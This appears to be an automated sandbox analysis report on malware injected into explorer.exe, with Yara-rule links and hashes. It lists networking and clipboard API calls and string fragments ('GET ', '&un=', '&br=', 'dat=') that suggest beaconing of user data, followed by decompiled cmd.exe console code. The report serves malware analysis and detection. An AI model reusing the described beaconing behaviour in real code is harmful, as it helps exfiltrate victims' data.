                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 6140 explorer.exeCOMMON

                                                    Executed Functions

                                                    Function 04DD3302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: getaddrinforecvsetsockopt
                                                    • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                    • API String ID: 1564272048-2976227712
                                                    • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                    • Instruction ID: 74af351f0f06e8e673932493a46123e9a121a6fffa5b22c86e2bd6430f2dafce
                                                    • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                    • Instruction Fuzzy Hash: BB626230618B088BDB69EF68D4847EAB7E1FB98304F50492ED59BC7242EF30B545CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCCEB2, Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: ClipboardOpen
                                                    • String ID:
                                                    • API String ID: 2793039342-0
                                                    • Opcode ID: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                    • Instruction ID: 00f6fb3b61f48fda19e19cc893a6d4caf136f31eb5f5d5b559169a298c20c786
                                                    • Opcode Fuzzy Hash: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                    • Instruction Fuzzy Hash: E011A530225D0A8FDB55AB28848C3B635D0FB48306F5814BD964FCB0C1DF75D586DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCFEFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: clos$esoc$ket
                                                    • API String ID: 2781271927-3604069445
                                                    • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                    • Instruction ID: e98ba89f251367a7f1579b5541c2880811493996445d65eb4cff57ecc5fab470
                                                    • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                    • Instruction Fuzzy Hash: 90F0907021CB089FCBC0DF1894887E9B7E0FB8A314F54056EE48DCB244CB7885468793
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCFF02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: clos$esoc$ket
                                                    • API String ID: 2781271927-3604069445
                                                    • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                    • Instruction ID: 6c14d905eca49e7cef79a69a9dbdfc9a5b1f801f8caea2221e790ce1c923fb80
                                                    • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                    • Instruction Fuzzy Hash: 59F0177021CB089FDB84EF18D4C87A9B7E0FB89314F64556DA48ECB244CB7889468B93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCFE7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                    • Instruction ID: e60f38fde59713734308ecde43dc7b227836c27dd8971771c982f849aa146a1b
                                                    • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                    • Instruction Fuzzy Hash: 08011A70618A088FDB84EF5CE488B15BBE0EB59314F1545AEA90DCB267CAB4D8858B85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCFE82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: connect
                                                    • String ID: conn$ect
                                                    • API String ID: 1959786783-716201944
                                                    • Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                    • Instruction ID: 46e98a09ef9172b8258994dfc126fb7ffa2257609507a74ef05b91d3b991d899
                                                    • Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                    • Instruction Fuzzy Hash: B9012C70618A088FDB84EF5CE488B15B7E0FB58314F1541AEA80DCB267CA70D8818B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCFDF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: send
                                                    • API String ID: 2809346765-2809346765
                                                    • Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                    • Instruction ID: 4069e6d7c7ae3061db088681ce3a4910501a5fe7df6e8d457e1b05c9be97711f
                                                    • Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                    • Instruction Fuzzy Hash: 4E012130618A088FDB84EF5CA089B1577E0EB98324F1545AE984DCB266CB70D881CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCFE02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: send
                                                    • String ID: send
                                                    • API String ID: 2809346765-2809346765
                                                    • Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                    • Instruction ID: 1f6f8c67e342dee28b47d920ccb4aebdee66fa00c551ba07731bbff7ce889d7b
                                                    • Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                    • Instruction Fuzzy Hash: 0501123061CB088FDB84EF5CE488B1577E0EB5C314F1545AE984DCB266CB70D881CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCFD02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID: sock
                                                    • API String ID: 98920635-2415254727
                                                    • Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                    • Instruction ID: 5cfca38bde270872cacab1bc0286ffe39e97580c0c676cb533b7d672da470896
                                                    • Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                    • Instruction Fuzzy Hash: 2A012C70658A188FDB84EF1CE048B14BBE0FB98314F1541AEE84DCB266C7B0D9418B86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCB272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                    • Instruction ID: 6f07ec41b2d430a9242e6d0b29e2c03bd2bbd945ecb3b02aff843dc655836b5e
                                                    • Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                    • Instruction Fuzzy Hash: EA215E30614B4E8FDB64EF5890953AAB7A2FB95301F48066F991ECB206CF30F441CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04DCCEAA, Relevance: 1.6, APIs: 1, Instructions: 64clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.923814797.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                    Similarity
                                                    • API ID: ClipboardOpen
                                                    • String ID:
                                                    • API String ID: 2793039342-0
                                                    • Opcode ID: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                    • Instruction ID: 15350cb86d975202626ead25eb5d1916e7c251d1d9647a443daa4e75b5e2f533
                                                    • Opcode Fuzzy Hash: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                    • Instruction Fuzzy Hash: 59117030225E0A8FDB55AB28888C7B93690FB48306F5854BD964ECB1C2DF75D586DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: cmd.exe PID: 5960 Parent PID: 3424 cmd.exeCOMMON

                                                    Executed Functions

                                                    Non-executed Functions

                                                    Function 011F3506, Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E011F3506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0x1213cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0x1217f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0x1217f20);
					_t87 = _t86;
				} else {
					_t147 = 0x20;
					_t196 =  *0x11fd0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0x11fd0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0x11fd0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E011FB4DD( *0x11fd0d4 & 0x0000ffff);
							 *0x11fd580 = 0;
							 *0x11fd578 = 0;
							 *0x11fd574 = 0;
							 *0x11fd57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0x1217f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0x1217f20);
								_v68 =  *_v88;
								if( *0x11fd544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
									EnterCriticalSection( *0x1203858);
									 *0x11fd544 = 0;
									LeaveCriticalSection( *0x1203858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0x11fd0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0x11fd0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E011FB2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E011E7797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0x121c014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E011F9897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E011E06C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E011E1040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E011E6FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}







































































                                                    0x011f3506
                                                    0x011f350e
                                                    0x011f3511
                                                    0x011f3518
                                                    0x011f351e
                                                    0x011f3524
                                                    0x011f3526
                                                    0x011f352a
                                                    0x011f352e
                                                    0x011f3534
                                                    0x011f353b
                                                    0x011f353f
                                                    0x011f3546
                                                    0x011f3546
                                                    0x011f3551
                                                    0x011f3932
                                                    0x011f3938
                                                    0x011f3949
                                                    0x011f3952
                                                    0x011f3958
                                                    0x011f3557
                                                    0x011f3559
                                                    0x011f355a
                                                    0x011f3561
                                                    0x00000000
                                                    0x011f3567
                                                    0x011f3567
                                                    0x011f356e
                                                    0x00000000
                                                    0x011f3588
                                                    0x011f3588
                                                    0x011f3598
                                                    0x011f359c
                                                    0x011f359e
                                                    0x011f35a0
                                                    0x011f35a3
                                                    0x011f35a7
                                                    0x011f35af
                                                    0x011f35b3
                                                    0x011f35b7
                                                    0x011f35bb
                                                    0x011f35bf
                                                    0x011f35c4
                                                    0x011f35ca
                                                    0x011f35d0
                                                    0x011f35d6
                                                    0x011f35dc
                                                    0x011f35dc
                                                    0x011f35e1
                                                    0x011f35f8
                                                    0x011f3603
                                                    0x011f3607
                                                    0x011f361a
                                                    0x011f361e
                                                    0x011f365a
                                                    0x011f365a
                                                    0x011f3620
                                                    0x011f3626
                                                    0x011f3634
                                                    0x011f3639
                                                    0x011f3641
                                                    0x011f364e
                                                    0x011f364e
                                                    0x011f3654
                                                    0x011f3656
                                                    0x011f3656
                                                    0x011f3661
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3667
                                                    0x011f366a
                                                    0x011f366f
                                                    0x011f3676
                                                    0x00000000
                                                    0x011f3678
                                                    0x011f3678
                                                    0x011f3678
                                                    0x011f367f
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3681
                                                    0x011f3688
                                                    0x011f36c8
                                                    0x00000000
                                                    0x011f368a
                                                    0x011f368a
                                                    0x011f3691
                                                    0x011f36ba
                                                    0x011f36be
                                                    0x011f36d4
                                                    0x011f36d4
                                                    0x011f36d7
                                                    0x00000000
                                                    0x011f36d9
                                                    0x011f36d9
                                                    0x011f36d9
                                                    0x011f36dc
                                                    0x00000000
                                                    0x011f36de
                                                    0x011f36e2
                                                    0x011f36e6
                                                    0x011f36ea
                                                    0x011f36ec
                                                    0x011f3729
                                                    0x011f3729
                                                    0x011f36ee
                                                    0x011f36ee
                                                    0x011f36f0
                                                    0x011f36f2
                                                    0x011f36f2
                                                    0x011f36f5
                                                    0x011f36f8
                                                    0x00000000
                                                    0x00000000
                                                    0x011f36fa
                                                    0x011f36fd
                                                    0x011f3714
                                                    0x011f3714
                                                    0x011f3716
                                                    0x011f36ff
                                                    0x011f36ff
                                                    0x011f3703
                                                    0x011f3707
                                                    0x00000000
                                                    0x011f3709
                                                    0x011f3709
                                                    0x011f370c
                                                    0x011f370f
                                                    0x011f3712
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3712
                                                    0x011f3707
                                                    0x011f3721
                                                    0x011f3721
                                                    0x011f3725
                                                    0x011f3727
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f3727
                                                    0x011f371a
                                                    0x011f371c
                                                    0x011f371f
                                                    0x011f371f
                                                    0x00000000
                                                    0x011f371f
                                                    0x011f3731
                                                    0x011f3731
                                                    0x011f3735
                                                    0x011f3737
                                                    0x011f373d
                                                    0x011f3742
                                                    0x011f3750
                                                    0x011f3756
                                                    0x011f3759
                                                    0x011f375b
                                                    0x011f37db
                                                    0x011f37dd
                                                    0x011f375d
                                                    0x011f3765
                                                    0x011f376b
                                                    0x011f376e
                                                    0x011f3770
                                                    0x00000000
                                                    0x011f3772
                                                    0x011f377a
                                                    0x011f3780
                                                    0x011f3783
                                                    0x011f3785
                                                    0x00000000
                                                    0x011f3787
                                                    0x011f378f
                                                    0x011f3795
                                                    0x011f3798
                                                    0x011f379a
                                                    0x00000000
                                                    0x011f379c
                                                    0x011f37a4
                                                    0x011f37aa
                                                    0x011f37ad
                                                    0x011f37af
                                                    0x00000000
                                                    0x011f37b1
                                                    0x011f37b9
                                                    0x011f37bf
                                                    0x011f37c2
                                                    0x011f37c4
                                                    0x00000000
                                                    0x011f37c6
                                                    0x011f37ce
                                                    0x011f37d4
                                                    0x011f37d7
                                                    0x011f37d9
                                                    0x011f37e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f37d9
                                                    0x011f37c4
                                                    0x011f37af
                                                    0x011f379a
                                                    0x011f3785
                                                    0x011f3770
                                                    0x011f375b
                                                    0x011f3742
                                                    0x011f37e4
                                                    0x011f37eb
                                                    0x011f37ed
                                                    0x011f37fa
                                                    0x011f37fb
                                                    0x011f37ff
                                                    0x011f3804
                                                    0x011f3806
                                                    0x011f38a7
                                                    0x011f38ac
                                                    0x011f38ae
                                                    0x011f38b2
                                                    0x011f38b2
                                                    0x011f38b8
                                                    0x011f38ba
                                                    0x011f38ba
                                                    0x011f38bd
                                                    0x011f38bd
                                                    0x011f38c0
                                                    0x011f38c3
                                                    0x011f38c3
                                                    0x011f38ca
                                                    0x011f38ca
                                                    0x011f38ce
                                                    0x011f380c
                                                    0x011f380c
                                                    0x011f381a
                                                    0x011f3820
                                                    0x011f3822
                                                    0x011f383b
                                                    0x011f383b
                                                    0x011f383d
                                                    0x011f3842
                                                    0x011f3842
                                                    0x011f3846
                                                    0x011f3848
                                                    0x011f3848
                                                    0x011f384b
                                                    0x011f384b
                                                    0x011f384e
                                                    0x011f3851
                                                    0x011f3851
                                                    0x011f3861
                                                    0x011f3865
                                                    0x011f386f
                                                    0x011f3870
                                                    0x011f3871
                                                    0x011f3875
                                                    0x011f3877
                                                    0x011f387b
                                                    0x011f3892
                                                    0x011f389c
                                                    0x011f38a0
                                                    0x011f38a0
                                                    0x011f38d2
                                                    0x011f38d4
                                                    0x011f38e9
                                                    0x011f38e9
                                                    0x011f38d6
                                                    0x011f38d7
                                                    0x011f38e1
                                                    0x011f38e1
                                                    0x011f38eb
                                                    0x011f38ed
                                                    0x011f38ed
                                                    0x011f38f0
                                                    0x011f38f0
                                                    0x011f38f3
                                                    0x011f38f6
                                                    0x011f38f6
                                                    0x011f38ff
                                                    0x011f38ff
                                                    0x011f3902
                                                    0x011f3917
                                                    0x011f3919
                                                    0x011f391b
                                                    0x011f392e
                                                    0x011f391d
                                                    0x011f391d
                                                    0x011f3924
                                                    0x00000000
                                                    0x011f3924
                                                    0x011f391b
                                                    0x011f36dc
                                                    0x011f3693
                                                    0x011f3697
                                                    0x011f369a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f369a
                                                    0x011f3691
                                                    0x00000000
                                                    0x011f3688
                                                    0x011f36ce
                                                    0x011f36d0
                                                    0x00000000
                                                    0x011f36d0
                                                    0x00000000
                                                    0x011f3676
                                                    0x011f369c
                                                    0x011f369e
                                                    0x011f36ab
                                                    0x011f36ab
                                                    0x011f36b1
                                                    0x011f36b1
                                                    0x011f356e
                                                    0x011f3561
                                                    0x011f395a
                                                    0x011f395e
                                                    0x011f395f
                                                    0x011f3960
                                                    0x011f396b

                                                    APIs
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 011F352E
                                                    • _get_osfhandle.MSVCRT ref: 011F353F
                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F357A
                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F35E1
                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 011F35F8
                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F3607
                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3626
                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F3639
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F3647
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F364E
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 011F36A4
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F36AB
                                                    • _wcsnicmp.MSVCRT ref: 011F3750
                                                    • _wcsnicmp.MSVCRT ref: 011F3765
                                                    • _wcsnicmp.MSVCRT ref: 011F377A
                                                    • _wcsnicmp.MSVCRT ref: 011F378F
                                                    • _wcsnicmp.MSVCRT ref: 011F37A4
                                                    • _wcsnicmp.MSVCRT ref: 011F37B9
                                                    • _wcsnicmp.MSVCRT ref: 011F37CE
                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 011F381A
                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 011F3865
                                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 011F387B
